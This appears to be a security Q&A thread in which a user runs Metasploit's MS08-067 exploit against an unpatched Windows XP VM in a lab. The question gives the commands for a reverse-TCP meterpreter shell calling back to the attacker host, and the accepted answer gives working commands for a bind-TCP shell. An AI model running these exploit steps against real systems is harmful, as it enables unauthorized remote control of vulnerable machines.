Use Metasploit to exploit SMB through Conficker

Question

I've got an SP0/unpatched Windows XP which is vulnerable to the Conficker worm. I'm using metasploit to use the Conficker exploit with the purpose of opening a remote shell/command line.

My Metasploit script is the following one:

use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z

In my case, I have machines with address in 192.168.239.* and LPORT = 443.

In this way, I should be able to open a session with the remote vulnerable machine (sessions -i 1), thus executing the command line application (execute -i -f cmd.exe) and obtaining a remote command line.

Nevertheless, when I execute the script, although I get Meterpreter opening a session with the victim, this session is closed (Reason: Died) after a few seconds.

I've found that it could be related to the fact I'm using two VMWare Virtual Machines during my test.
As suggested, I tried with set InitialAutoRunScript migrate -f, but nothing changes.

How can I prevent Meterpreter sessions to be closed?
And, most importantly, why are they closed?

Your real question seems to be: "why is my meterpreter session closing after a few seconds?" Look at other migration options. And, try harder ;) — schroeder, Dec 17 '13 at 20:52

score 1 · Accepted Answer · answered Dec 18 '13 at 15:59

I've solved by varying the payload used by Metasploit. In particular, using bind_tcp payload Meterpreter connections are not closed anymore after a few seconds, and I obtain a remote shell/command line.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp
set RHOST <vulnerable_win_xp_ip>
show targets
set TARGET <n>
run

In my case <n> = 2, but in general it depends from previous step.

Use Metasploit to exploit SMB through Conficker

1 Answers1